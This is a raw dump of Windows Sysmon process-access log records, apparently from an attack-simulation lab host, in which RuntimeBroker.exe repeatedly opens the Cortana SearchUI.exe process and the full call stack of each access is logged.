12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006956Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006955Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006954Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006953Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006952Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006951Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006950Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006949Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006948Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006947Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006946Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006945Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006944Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006943Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006942Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006941Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1528d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009 10341000x80000000000000006940Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000006939Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000006938Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 